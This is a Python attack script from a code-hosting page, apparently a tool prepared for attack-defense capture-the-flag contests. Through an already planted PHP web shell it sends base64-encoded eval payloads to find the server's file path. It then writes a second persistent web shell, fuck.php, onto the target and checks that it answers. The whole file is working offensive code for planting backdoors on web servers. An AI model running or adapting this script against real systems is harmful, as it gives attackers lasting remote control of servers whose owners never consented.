sangge/Prepare-for-AWD
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Prepare-for-AWD/attack_python/plugin/upload.py

127 lines
4.1 KiB
Python
Raw Permalink Blame History

#!/usr/bin/python
#coding=utf-8
import sys,requests,base64
#获取靶机的绝对路径
def getpath(url,method,passwd):
data = {}
if method == "get":
data[passwd] = '@eval(base64_decode($_GET[z0]));'
data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
res = requests.get(url,params=data)
return res.content.strip()
elif method == "post" :
data['pass']='Sn3rtf4ck'
data[passwd] = '@eval(base64_decode($_POST[z0]));'
data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
res = requests.post(url,data=data)
#print data
return res.content.strip()
else :
return 0
#加载要上传的后门内容
def loadfile(filepath):
try :
file = open(filepath,"rb")
return str(file.read())
except :
print("File %s Not Found!" %filepath)
sys.exit()
#写马函数
def upload(url,method,passwd):
#http://127.0.0.1:80/1110/x.php,post,x
'''
1.http or https
2.端口要放在ip变量中
3.Rfile /1110/x.php
'''
try:
url.index("http")
#去除http:// ==> 127.0.0.1:80/1110/x.php
urlstr=url[7:]
lis = urlstr.split("/")
ip=str(lis[0])
Rfile = ""
for i in range(1,len(lis)):
Rfile = Rfile+"/"+str(lis[i])
except :
urlstr=url[8:]
lis = urlstr.split("/")
ip=str(lis[0])
Rfile = ""
for i in range(1,len(lis)):
Rfile = Rfile+"/"+str(lis[i])
#判断shell是否存在
try :
res = requests.get(url,timeout=10)
except :
print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
return 0
if res.status_code!=200 :
print("[-] %s Page Not Found!" %url)
return 0
#加载要写入的内容
shellPath = "./shell.php"
shell_content = loadfile(shellPath)
#获取靶机的绝对路径
Rpath = getpath(url,method,passwd)#D:/phpStudy/WWW/1110/x.php
list0 = Rpath.split("/")
Rpath = ""
for i in range(0,(len(list0)-1)):
Rpath = Rpath+list0[i]+"/"
data = {}
#判断method
if method =="post" :
data['pass']='Sn3rtf4ck'
data[passwd] = "@eval(base64_decode($_POST['z0']));"
#data['z1']='%2fJzEnOicwJyk7O2VjaG8oIlhAWSIpO2RpZSgpOw%3d%3d'
data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOyRjPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MiJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49c3Vic3RyKCRjLCRpLDIpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwndycpLCRidWYpPycxJzonMCcpOztlY2hvKCJYQFkiKTtkaWUoKTs='
data['z1'] = base64.b64encode(Rpath+"/fuck.php")
data["z2"] = base64.b64encode(shell_content)
#print data
try:
res = requests.post(url,data=data)
except:
print("[-] %s Shell has already been Deleted"%url)
elif method=="get" :
data[passwd] = "@eval(base64_decode($_GET['z0']));"
data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsiejIiXSk7JGM9c3RyX3JlcGxhY2UoIlxyIiwiIiwkYyk7JGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7JGJ1Zj0iIjtmb3IoJGk9MDskaTxzdHJsZW4oJGMpOyRpKz0yKSRidWYuPXN1YnN0cigkYywkaSwyKTtlY2hvKEBmd3JpdGUoZm9wZW4oJGYsJ3cnKSwkYnVmKT8nMSc6JzAnKTs7ZWNobygiWEBZIik7ZGllKCk7'
data['z1'] = base64.b64encode(Rpath+"/fuck.php")
data["z2"] = base64.b64encode(shell_content)
try:
res = requests.post(url,params=data)
except:
print("[-] %s Shell has already been Deleted"%url)
else :
print("method err!")
sys.exit()
#判断是否上传成功,失败直接跳过
#print res.content
if res.status_code!=200:
print("[-] %s upload failed!" %ip)
return 0
#激活不死马
list=Rfile.split("/")
b_url="http://"+ip
max = len(list)-1
for i in range(1,max):
b_url=b_url+"/"+list[i]
shell_url = b_url+"/fuck.php"
try :
res = requests.get(shell_url,timeout=3)
#输出shell地址
if res.status_code==200:
print("[+] %s upload sucessed!" %shell_url)
else :
print("[-] %s shell Not Found!" %shell_url)
except :
print("[-] %s shell Not Found!" %shell_url)
Reference in New Issue View Git Blame Copy Permalink